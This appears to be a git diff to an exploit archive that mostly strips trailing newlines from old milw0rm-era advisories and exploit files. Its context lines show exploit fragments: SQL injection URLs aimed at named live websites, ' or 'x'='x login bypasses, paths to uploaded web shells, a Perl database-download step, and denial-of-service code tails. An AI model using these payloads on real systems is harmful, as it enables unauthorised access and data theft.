4a864d121..be78b128c 100755 --- a/platforms/asp/webapps/7861.txt +++ b/platforms/asp/webapps/7861.txt @@ -30,4 +30,4 @@ Onun derdini gördüm, derdime İMRENDİM... FilistiN ---------- -# milw0rm.com [2009-01-25] +# milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/platforms/asp/webapps/7872.txt b/platforms/asp/webapps/7872.txt index 832329b4c..c5fb645db 100755 --- a/platforms/asp/webapps/7872.txt +++ b/platforms/asp/webapps/7872.txt @@ -59,4 +59,4 @@ <<->> All freinds , all muslims , [ www.tryag.cc/cc ] , [ sec-code.com/vb ] , str0ke -# milw0rm.com [2009-01-26] +# milw0rm.com [2009-01-26] \ No newline at end of file diff --git a/platforms/asp/webapps/7924.txt b/platforms/asp/webapps/7924.txt index 8a579093e..0fcd4834d 100755 --- a/platforms/asp/webapps/7924.txt +++ b/platforms/asp/webapps/7924.txt @@ -63,4 +63,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN ---------- -# milw0rm.com [2009-01-30] +# milw0rm.com [2009-01-30] \ No newline at end of file diff --git a/platforms/asp/webapps/7963.txt b/platforms/asp/webapps/7963.txt index a0ec01da6..5ec64b64b 100755 --- a/platforms/asp/webapps/7963.txt +++ b/platforms/asp/webapps/7963.txt @@ -35,4 +35,4 @@ Pass : 'or' ############################################# -# milw0rm.com [2009-02-03] +# milw0rm.com [2009-02-03] \ No newline at end of file diff --git a/platforms/asp/webapps/7981.txt b/platforms/asp/webapps/7981.txt index 27d78afb3..51ae5fe20 100755 --- a/platforms/asp/webapps/7981.txt +++ b/platforms/asp/webapps/7981.txt @@ -27,4 +27,4 @@ http://www.ahss.gov.cn --------------------------------------------------------- ######################################################### -# milw0rm.com [2009-02-04] +# milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/platforms/asp/webapps/7982.txt b/platforms/asp/webapps/7982.txt index 9a2331f0a..156946d08 100755 --- a/platforms/asp/webapps/7982.txt +++ b/platforms/asp/webapps/7982.txt @@ -26,4 +26,4 @@ http://www.sxlcfda.gov.cn/yjlt --------------------------------------------------------- ######################################################### -# milw0rm.com [2009-02-04] +# milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/platforms/asp/webapps/7991.txt b/platforms/asp/webapps/7991.txt index f446b599d..7533ee3f7 100755 --- a/platforms/asp/webapps/7991.txt +++ b/platforms/asp/webapps/7991.txt @@ -14,4 +14,4 @@ Download : http://sirini.net/grboard/board.php?id=grnote&articleNo=5 __h0__ -# milw0rm.com [2009-02-04] +# milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/platforms/asp/webapps/8048.txt b/platforms/asp/webapps/8048.txt index 8df093931..1b395adb8 100755 --- a/platforms/asp/webapps/8048.txt +++ b/platforms/asp/webapps/8048.txt @@ -38,4 +38,4 @@ Special Thanks : The-0utl4w,AURA,Zac003,Sasan_4shir,Reza.exe, Sc0rpion,Black.Shadowes,Ali_aria,bl2k,Tabalooga,Virangar,Pouya_Server And All my Friend's -# milw0rm.com [2009-02-12] +# milw0rm.com [2009-02-12] \ No newline at end of file diff --git a/platforms/asp/webapps/8065.txt b/platforms/asp/webapps/8065.txt index 8b0c8c1f3..6db2736a5 100755 --- a/platforms/asp/webapps/8065.txt +++ b/platforms/asp/webapps/8065.txt @@ -17,4 +17,4 @@ http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0 #note : the injection's details are in page title ! xD -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/asp/webapps/8070.txt b/platforms/asp/webapps/8070.txt index 292e446ab..c6a9558b7 100755 --- a/platforms/asp/webapps/8070.txt +++ b/platforms/asp/webapps/8070.txt @@ -41,4 +41,4 @@ shell: http://www.aebest.com/upload_images/z.asp [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-02-17] +# milw0rm.com [2009-02-17] \ No newline at end of file diff --git a/platforms/asp/webapps/8107.txt b/platforms/asp/webapps/8107.txt index 2f421b0a1..e036710e4 100755 --- a/platforms/asp/webapps/8107.txt +++ b/platforms/asp/webapps/8107.txt @@ -43,4 +43,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN @~~=======================================~~@ -# milw0rm.com [2009-02-25] +# milw0rm.com [2009-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/8109.txt b/platforms/asp/webapps/8109.txt index b835983d2..22c864246 100755 --- a/platforms/asp/webapps/8109.txt +++ b/platforms/asp/webapps/8109.txt @@ -45,4 +45,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN @~~=======================================~~@ -# milw0rm.com [2009-02-25] +# milw0rm.com [2009-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/8110.txt b/platforms/asp/webapps/8110.txt index c812e3b74..01833b0cb 100755 --- a/platforms/asp/webapps/8110.txt +++ b/platforms/asp/webapps/8110.txt @@ -45,4 +45,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN @~~=======================================~~@ -# milw0rm.com [2009-02-25] +# milw0rm.com [2009-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/8111.txt b/platforms/asp/webapps/8111.txt index 22961a8cf..399ac0d81 100755 --- a/platforms/asp/webapps/8111.txt +++ b/platforms/asp/webapps/8111.txt @@ -47,4 +47,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN @~~=======================================~~@ -# milw0rm.com [2009-02-25] +# milw0rm.com [2009-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/8113.txt b/platforms/asp/webapps/8113.txt index fe015dedf..8e2a58bf0 100755 --- a/platforms/asp/webapps/8113.txt +++ b/platforms/asp/webapps/8113.txt @@ -44,4 +44,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN @~~=======================================~~@ -# milw0rm.com [2009-02-26] +# milw0rm.com [2009-02-26] \ No newline at end of file diff --git a/platforms/asp/webapps/8120.txt b/platforms/asp/webapps/8120.txt index ba56faae8..fd84e4d3e 100755 --- a/platforms/asp/webapps/8120.txt +++ b/platforms/asp/webapps/8120.txt @@ -41,4 +41,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN @~~=======================================~~@ -# milw0rm.com [2009-02-27] +# milw0rm.com [2009-02-27] \ No newline at end of file diff --git a/platforms/asp/webapps/8130.txt b/platforms/asp/webapps/8130.txt index ab4a3d458..035e17b89 100755 --- a/platforms/asp/webapps/8130.txt +++ b/platforms/asp/webapps/8130.txt @@ -51,4 +51,4 @@ Vs.... :( :( :( @~~=======================================~~@ -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/asp/webapps/8131.txt b/platforms/asp/webapps/8131.txt index fca5e2979..ebac82a2f 100755 --- a/platforms/asp/webapps/8131.txt +++ b/platforms/asp/webapps/8131.txt @@ -44,4 +44,4 @@ Vs.... :( :( :( @~~=======================================~~@ -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/asp/webapps/8132.txt b/platforms/asp/webapps/8132.txt index 55efe66de..e7ba2c649 100755 --- a/platforms/asp/webapps/8132.txt +++ b/platforms/asp/webapps/8132.txt @@ -43,4 +43,4 @@ http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp [+] Greetz : MaTrEx & samkmk.almkkar & 3lo0osh & ili The General ili & Super-Code & BxH &all tryag members & all muslims -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/asp/webapps/8307.txt b/platforms/asp/webapps/8307.txt index 828c1a995..0e3a4f393 100755 --- a/platforms/asp/webapps/8307.txt +++ b/platforms/asp/webapps/8307.txt @@ -39,4 +39,4 @@ ** Live demo : http://www.diskos.dk/ **************************************************************** -# milw0rm.com [2009-03-30] +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/platforms/asp/webapps/8377.pl b/platforms/asp/webapps/8377.pl index c8512a7af..66baead98 100755 --- a/platforms/asp/webapps/8377.pl +++ b/platforms/asp/webapps/8377.pl @@ -53,4 +53,4 @@ my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();} else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/asp/webapps/8379.txt b/platforms/asp/webapps/8379.txt index 1a0ab4d20..8505bd341 100755 --- a/platforms/asp/webapps/8379.txt +++ b/platforms/asp/webapps/8379.txt @@ -26,4 +26,4 @@ **************************************************************** ** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/asp/webapps/8397.txt b/platforms/asp/webapps/8397.txt index a17219913..6be0b4840 100755 --- a/platforms/asp/webapps/8397.txt +++ b/platforms/asp/webapps/8397.txt @@ -64,4 +64,4 @@ http://demo.funkyasp.com/demo/banner/banners/z.asp [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-04-10] +# milw0rm.com [2009-04-10] \ No newline at end of file diff --git a/platforms/asp/webapps/8529.txt b/platforms/asp/webapps/8529.txt index 879ec540d..37bdb04b8 100755 --- a/platforms/asp/webapps/8529.txt +++ b/platforms/asp/webapps/8529.txt @@ -30,4 +30,4 @@ http://www.xigla.com/absolutefp/demo/menu.asp [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-04-24] +# milw0rm.com [2009-04-24] \ No newline at end of file diff --git a/platforms/asp/webapps/8530.htm b/platforms/asp/webapps/8530.htm index 507d0ba3d..644e84f4a 100755 --- a/platforms/asp/webapps/8530.htm +++ b/platforms/asp/webapps/8530.htm @@ -49,4 +49,4 @@ Cod[3]d By ThE g0bL!N

-# milw0rm.com [2009-04-24] +# milw0rm.com [2009-04-24] \ No newline at end of file diff --git a/platforms/asp/webapps/8596.pl b/platforms/asp/webapps/8596.pl index 110864a46..d49fc0555 100755 --- a/platforms/asp/webapps/8596.pl +++ b/platforms/asp/webapps/8596.pl @@ -67,4 +67,4 @@ print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/asp/webapps/8610.pl b/platforms/asp/webapps/8610.pl index 6185d904a..6a0af0895 100755 --- a/platforms/asp/webapps/8610.pl +++ b/platforms/asp/webapps/8610.pl @@ -48,4 +48,4 @@ help(); exit; } -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/asp/webapps/8627.txt b/platforms/asp/webapps/8627.txt index 99e3360d8..5fc99c720 100755 --- a/platforms/asp/webapps/8627.txt +++ b/platforms/asp/webapps/8627.txt @@ -22,4 +22,4 @@ http://www.t-dreams.com/demo/jobcareerv3/Admin/login.asp Greeting To ALL My Friends (Dz) ---------------------------------------------------------------- -# milw0rm.com [2009-05-07] +# milw0rm.com [2009-05-07] \ No newline at end of file diff --git a/platforms/asp/webapps/8705.txt b/platforms/asp/webapps/8705.txt index e0f3d486d..b0d3917f8 100755 --- a/platforms/asp/webapps/8705.txt +++ b/platforms/asp/webapps/8705.txt @@ -24,4 +24,4 @@ V1V4 GaZa Thanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker -# milw0rm.com [2009-05-15] +# milw0rm.com [2009-05-15] \ No newline at end of file diff --git a/platforms/asp/webapps/8719.py b/platforms/asp/webapps/8719.py index effd81763..578f7e9c0 100755 --- a/platforms/asp/webapps/8719.py +++ b/platforms/asp/webapps/8719.py @@ -129,4 +129,4 @@ else: print "[+] Username : "+found_users[0] print "[+] Password : hacked" -# milw0rm.com [2009-05-18] +# milw0rm.com [2009-05-18] \ No newline at end of file diff --git a/platforms/asp/webapps/8726.txt b/platforms/asp/webapps/8726.txt index 05bdf8a7f..82f16d6ff 100755 --- a/platforms/asp/webapps/8726.txt +++ b/platforms/asp/webapps/8726.txt @@ -17,4 +17,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-05-18] +# milw0rm.com [2009-05-18] \ No newline at end of file diff --git a/platforms/asp/webapps/8734.txt b/platforms/asp/webapps/8734.txt index faba7c333..df74dcb69 100755 --- a/platforms/asp/webapps/8734.txt +++ b/platforms/asp/webapps/8734.txt @@ -19,4 +19,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-05-19] +# milw0rm.com [2009-05-19] \ No newline at end of file diff --git a/platforms/asp/webapps/8749.txt b/platforms/asp/webapps/8749.txt index c5e5adba2..47a4e6e01 100755 --- a/platforms/asp/webapps/8749.txt +++ b/platforms/asp/webapps/8749.txt @@ -21,4 +21,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-05-20] +# milw0rm.com [2009-05-20] \ No newline at end of file diff --git a/platforms/asp/webapps/8756.txt b/platforms/asp/webapps/8756.txt index e0439de9d..35217fc78 100755 --- a/platforms/asp/webapps/8756.txt +++ b/platforms/asp/webapps/8756.txt @@ -32,4 +32,4 @@ http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+ [peace xD] -# milw0rm.com [2009-05-21] +# milw0rm.com [2009-05-21] \ No newline at end of file diff --git a/platforms/asp/webapps/8785.txt b/platforms/asp/webapps/8785.txt index ff5c10601..4ab2122b4 100755 --- a/platforms/asp/webapps/8785.txt +++ b/platforms/asp/webapps/8785.txt @@ -24,4 +24,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-05-26] +# milw0rm.com [2009-05-26] \ No newline at end of file diff --git a/platforms/asp/webapps/8849.txt b/platforms/asp/webapps/8849.txt index 5760e20e6..e29d3ecc3 100755 --- a/platforms/asp/webapps/8849.txt +++ b/platforms/asp/webapps/8849.txt @@ -30,4 +30,4 @@ http://www.site.com/[script]/admin.mdb Greeting To ALL My Friends (Dz) -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/asp/webapps/8859.txt b/platforms/asp/webapps/8859.txt index 19853bdf4..b83d42f6a 100755 --- a/platforms/asp/webapps/8859.txt +++ b/platforms/asp/webapps/8859.txt @@ -26,4 +26,4 @@ http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects [peace xD] -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/asp/webapps/8889.txt b/platforms/asp/webapps/8889.txt index 4c23c41d6..0fb9f0325 100755 --- a/platforms/asp/webapps/8889.txt +++ b/platforms/asp/webapps/8889.txt @@ -48,4 +48,4 @@ http://vt.rovno.info/demos/vt_auth/zHk8dEes3.txt @~~=:/ -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/asp/webapps/8890.txt b/platforms/asp/webapps/8890.txt index 9bf3d3c89..77a808587 100755 --- a/platforms/asp/webapps/8890.txt +++ b/platforms/asp/webapps/8890.txt @@ -40,4 +40,4 @@ @~~=:/ -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/asp/webapps/925.txt b/platforms/asp/webapps/925.txt index 46f239d50..fdcfaf592 100755 --- a/platforms/asp/webapps/925.txt +++ b/platforms/asp/webapps/925.txt @@ -17,4 +17,4 @@ auther : LaMeR securitygurus team -# milw0rm.com [2005-04-09] +# milw0rm.com [2005-04-09] \ No newline at end of file diff --git a/platforms/asp/webapps/9328.txt b/platforms/asp/webapps/9328.txt index 6e926fe0f..7673e21a3 100755 --- a/platforms/asp/webapps/9328.txt +++ b/platforms/asp/webapps/9328.txt @@ -4,4 +4,4 @@ Sistema : AW-BannerAd,Asp Scripts Archivo : adv/admin/index.asp User&Pass:' or 'x'='x :' or 'x'='x -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/asp/webapps/9562.txt b/platforms/asp/webapps/9562.txt index 7dd7965cc..85c6c79eb 100755 --- a/platforms/asp/webapps/9562.txt +++ b/platforms/asp/webapps/9562.txt @@ -161,4 +161,4 @@ information, please refer to https://www.sec-consult.com/academy_e.html EOF J. Greil / @2009 -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/asp/webapps/9612.txt b/platforms/asp/webapps/9612.txt index 5dfc4045d..c0a8db392 100755 --- a/platforms/asp/webapps/9612.txt +++ b/platforms/asp/webapps/9612.txt @@ -40,4 +40,4 @@ Reference ============ http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48 -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/asp/webapps/9675.txt b/platforms/asp/webapps/9675.txt index ca5975dab..fe3352018 100755 --- a/platforms/asp/webapps/9675.txt +++ b/platforms/asp/webapps/9675.txt @@ -58,4 +58,4 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠)) [~]-------------------------------------------------------------------------------- -# milw0rm.com [2009-09-15] +# milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/asp/webapps/9809.txt b/platforms/asp/webapps/9809.txt index 6cc849f62..5b809f701 100755 --- a/platforms/asp/webapps/9809.txt +++ b/platforms/asp/webapps/9809.txt @@ -28,4 +28,4 @@ could apply to this version aswell SHOUTS:4chan for being shit, yes I will troll in a POC. -antilimit owns you +antilimit owns you \ No newline at end of file diff --git a/platforms/asp/webapps/9834.txt b/platforms/asp/webapps/9834.txt index 2419294a0..177f36110 100755 --- a/platforms/asp/webapps/9834.txt +++ b/platforms/asp/webapps/9834.txt @@ -62,4 +62,4 @@ [x]========================================================================================================================================[x] | Note : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :) | | kabur.... untuk sementara waktu.... bye bye..... | -[x]========================================================================================================================================[x] +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/asp/webapps/9841.txt b/platforms/asp/webapps/9841.txt index b6125bbbf..f1efdc4e1 100755 --- a/platforms/asp/webapps/9841.txt +++ b/platforms/asp/webapps/9841.txt @@ -30,4 +30,4 @@ [x]========================================================================================================================================[x] | Note : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :) | | kabur.... untuk sementara waktu.... bye bye..... | -[x]========================================================================================================================================[x] +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/aspx/webapps/41086.txt b/platforms/aspx/webapps/41086.txt index f603fb96d..0a037161a 100755 --- a/platforms/aspx/webapps/41086.txt +++ b/platforms/aspx/webapps/41086.txt @@ -51,5 +51,4 @@ be fixed. Jan 17,2017 - Open redirection confirmed to be fixed in the same patch released before for DOR the vendor said they didn't believe that's a security concern and that they have added a warning to let users know that -their attachments will be available to anyone with access to that survey page !! - +their attachments will be available to anyone with access to that survey page !! \ No newline at end of file diff --git a/platforms/aspx/webapps/41618.txt b/platforms/aspx/webapps/41618.txt index 528e81efe..fa843092b 100755 --- a/platforms/aspx/webapps/41618.txt +++ b/platforms/aspx/webapps/41618.txt @@ -50,5 +50,4 @@ Help AG Middle East References ---------- [1] Help AG Middle East http://www.helpag.com/ -[2] Sitecore Experience Platform https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform.aspx - +[2] Sitecore Experience Platform https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform.aspx \ No newline at end of file diff --git a/platforms/aspx/webapps/41985.txt b/platforms/aspx/webapps/41985.txt index d1de03d75..92aa26856 100755 --- a/platforms/aspx/webapps/41985.txt +++ b/platforms/aspx/webapps/41985.txt @@ -26,5 +26,4 @@ Click on the vendor you wish to edit 3. Solution: -The fix is available at Personify’s SFTP site (sftp.personifycorp.com) as Personify Patch – SSO-IMS-DNN-Permission.zip - +The fix is available at Personify’s SFTP site (sftp.personifycorp.com) as Personify Patch – SSO-IMS-DNN-Permission.zip \ No newline at end of file diff --git a/platforms/aspx/webapps/41986.txt b/platforms/aspx/webapps/41986.txt index 0e06aec35..2ac483fdb 100755 --- a/platforms/aspx/webapps/41986.txt +++ b/platforms/aspx/webapps/41986.txt @@ -23,5 +23,4 @@ Select the "Role Based on Table" dropdown 3. Solution: -The fix is available at Personify’s SFTP site (sftp.personifycorp.com) as Personify Patch – SSO-IMS-DNN-Permission.zip - +The fix is available at Personify’s SFTP site (sftp.personifycorp.com) as Personify Patch – SSO-IMS-DNN-Permission.zip \ No newline at end of file diff --git a/platforms/atheos/local/21282.c b/platforms/atheos/local/21282.c index c371c8dfa..57e0305cb 100755 --- a/platforms/atheos/local/21282.c +++ b/platforms/atheos/local/21282.c @@ -23,4 +23,4 @@ int main(void) puts(e->d_name); } return 0; -} +} \ No newline at end of file diff --git a/platforms/beos/local/19841.casl b/platforms/beos/local/19841.casl index f42e32292..f178e4fc5 100755 --- a/platforms/beos/local/19841.casl +++ b/platforms/beos/local/19841.casl @@ -42,4 +42,4 @@ The networking process in BeOS can crash if certain malformed packets are transm IPH.ip_length = 27; packet = [ IPH ]; - ip_output(packet); + ip_output(packet); \ No newline at end of file diff --git a/platforms/bsd/dos/10185.txt b/platforms/bsd/dos/10185.txt index c82804fd4..8bc38933b 100755 --- a/platforms/bsd/dos/10185.txt +++ b/platforms/bsd/dos/10185.txt @@ -211,4 +211,4 @@ http://securityreason.pl/ iEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D ZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB =JY6k ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/bsd/dos/10186.txt b/platforms/bsd/dos/10186.txt index 913981d44..5cf12eda7 100755 --- a/platforms/bsd/dos/10186.txt +++ b/platforms/bsd/dos/10186.txt @@ -185,4 +185,4 @@ http://securityreason.pl/ iEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o l8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw =Zqoe ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/bsd/dos/10187.txt b/platforms/bsd/dos/10187.txt index abf5a0ac4..93c2903cc 100755 --- a/platforms/bsd/dos/10187.txt +++ b/platforms/bsd/dos/10187.txt @@ -218,4 +218,4 @@ http://securityreason.pl/ iEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV XqQAnR79bagErDfzJ3TV/MlLgrWXsGD7 =/IkD ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/bsd/dos/14947.txt b/platforms/bsd/dos/14947.txt index 2672e0dd4..1b2736bb4 100755 --- a/platforms/bsd/dos/14947.txt +++ b/platforms/bsd/dos/14947.txt @@ -340,4 +340,4 @@ http://securityreason.com/key/Arciemowicz.Maksymilian.gpg iEYEARECAAYFAkyGff0ACgkQpiCeOKaYa9b0QQCfbY7yNcbUa7TDOTYxzgN7ya0y yQMAn079PHiu7Uy5WU3gvsJnvzZ0M8qO =D5mh ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/bsd/dos/1540.pl b/platforms/bsd/dos/1540.pl index 370b6c226..9d0000924 100755 --- a/platforms/bsd/dos/1540.pl +++ b/platforms/bsd/dos/1540.pl @@ -28,4 +28,4 @@ my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" . $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n"; print $socket $printer . "\n"; -# milw0rm.com [2006-02-28] +# milw0rm.com [2006-02-28] \ No newline at end of file diff --git a/platforms/bsd/dos/17097.c b/platforms/bsd/dos/17097.c index 3aa1458dc..afb1cae79 100755 --- a/platforms/bsd/dos/17097.c +++ b/platforms/bsd/dos/17097.c @@ -849,4 +849,4 @@ diff -u -u -p -r1.36 ipcomp_input.c + } hlen = ip->ip_hl << 2; - cpi = ntohs(ipcomp->comp_cpi); + cpi = ntohs(ipcomp->comp_cpi); \ No newline at end of file diff --git a/platforms/bsd/dos/19423.c b/platforms/bsd/dos/19423.c index d53bdd7bd..0834d1b04 100755 --- a/platforms/bsd/dos/19423.c +++ b/platforms/bsd/dos/19423.c @@ -240,5 +240,4 @@ int main(int argc, char **argv) } #endif exit(42); -} - +} \ No newline at end of file diff --git a/platforms/bsd/dos/19564.c b/platforms/bsd/dos/19564.c index 3c9788d1f..5d4062181 100755 --- a/platforms/bsd/dos/19564.c +++ b/platforms/bsd/dos/19564.c @@ -162,4 +162,4 @@ int checksum(unsigned short *c, int len) /*###EOF####*/ -/* CUT HERE */ +/* CUT HERE */ \ No newline at end of file diff --git a/platforms/bsd/dos/19896.c b/platforms/bsd/dos/19896.c index c87b4108e..7ae39a00c 100755 --- a/platforms/bsd/dos/19896.c +++ b/platforms/bsd/dos/19896.c @@ -108,4 +108,4 @@ int main(int argc, char **argv) } free(buf); libnet_close_raw_sock(sock); -} +} \ No newline at end of file diff --git a/platforms/bsd/dos/19982.c b/platforms/bsd/dos/19982.c index 0afceb0e4..0fe7f96de 100755 --- a/platforms/bsd/dos/19982.c +++ b/platforms/bsd/dos/19982.c @@ -35,4 +35,4 @@ sizeof(int)); write(p[1], crap, BUFFERSIZE); } exit(0); -} +} \ No newline at end of file diff --git a/platforms/bsd/dos/21077.c b/platforms/bsd/dos/21077.c index 41c694a5a..abc78f0dd 100755 --- a/platforms/bsd/dos/21077.c +++ b/platforms/bsd/dos/21077.c @@ -30,4 +30,4 @@ int main() { execcode(); printf("*** system failure failed.\n"); exit(0); -} +} \ No newline at end of file diff --git a/platforms/bsd/dos/2524.c b/platforms/bsd/dos/2524.c index 81374e845..42dcc3bfe 100755 --- a/platforms/bsd/dos/2524.c +++ b/platforms/bsd/dos/2524.c @@ -11,4 +11,4 @@ int main(int argc, char *argv[]){ ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768); } -// milw0rm.com [2006-10-12] +// milw0rm.com [2006-10-12] \ No newline at end of file diff --git a/platforms/bsd/dos/2541.c b/platforms/bsd/dos/2541.c index c43994054..b760dc9af 100755 --- a/platforms/bsd/dos/2541.c +++ b/platforms/bsd/dos/2541.c @@ -24,4 +24,4 @@ ftruncate(fd,12345); close(fd); } -// milw0rm.com [2006-10-13] +// milw0rm.com [2006-10-13] \ No newline at end of file diff --git a/platforms/bsd/dos/2542.c b/platforms/bsd/dos/2542.c index 2f3ca26eb..f234e8723 100755 --- a/platforms/bsd/dos/2542.c +++ b/platforms/bsd/dos/2542.c @@ -13,4 +13,4 @@ sched_setscheduler(0,SCHED_FIFO,&lol); for(;;){} } -// milw0rm.com [2006-10-13] +// milw0rm.com [2006-10-13] \ No newline at end of file diff --git a/platforms/bsd/dos/2639.c b/platforms/bsd/dos/2639.c index bb845bc4b..6b7afc886 100755 --- a/platforms/bsd/dos/2639.c +++ b/platforms/bsd/dos/2639.c @@ -36,4 +36,4 @@ int main() return 0; } -// milw0rm.com [2006-10-24] +// milw0rm.com [2006-10-24] \ No newline at end of file diff --git a/platforms/bsd/dos/2874.pl b/platforms/bsd/dos/2874.pl index 9624fd310..540112a78 100755 --- a/platforms/bsd/dos/2874.pl +++ b/platforms/bsd/dos/2874.pl @@ -64,4 +64,4 @@ while (<$sock>) { print; } -# milw0rm.com [2006-11-30] +# milw0rm.com [2006-11-30] \ No newline at end of file diff --git a/platforms/bsd/dos/31333.txt b/platforms/bsd/dos/31333.txt index 5abbd9f27..81b88e335 100755 --- a/platforms/bsd/dos/31333.txt +++ b/platforms/bsd/dos/31333.txt @@ -12,5 +12,4 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -xxxxxxxxx - +xxxxxxxxx \ No newline at end of file diff --git a/platforms/bsd/dos/31550.c b/platforms/bsd/dos/31550.c index b065dc7f2..10c9e1dc1 100755 --- a/platforms/bsd/dos/31550.c +++ b/platforms/bsd/dos/31550.c @@ -16,4 +16,4 @@ int res; res=strfmon(bux, 50, argv[1], "0"); return 0; -} +} \ No newline at end of file diff --git a/platforms/bsd/dos/33708.c b/platforms/bsd/dos/33708.c index 7708841c8..1c87c79e3 100755 --- a/platforms/bsd/dos/33708.c +++ b/platforms/bsd/dos/33708.c @@ -44,4 +44,4 @@ void do_glob() { main(int argc, char **argv) { do_glob(); do_glob(); -} +} \ No newline at end of file diff --git a/platforms/bsd/dos/343.c b/platforms/bsd/dos/343.c index e7eeac11a..3c0656655 100755 --- a/platforms/bsd/dos/343.c +++ b/platforms/bsd/dos/343.c @@ -327,4 +327,4 @@ in_cksum(u_short *addr, int len) return(answer); } -// milw0rm.com [2002-09-17] +// milw0rm.com [2002-09-17] \ No newline at end of file diff --git a/platforms/bsd/dos/35058.c b/platforms/bsd/dos/35058.c index 090b3f503..bca88a53a 100755 --- a/platforms/bsd/dos/35058.c +++ b/platforms/bsd/dos/35058.c @@ -144,4 +144,4 @@ int 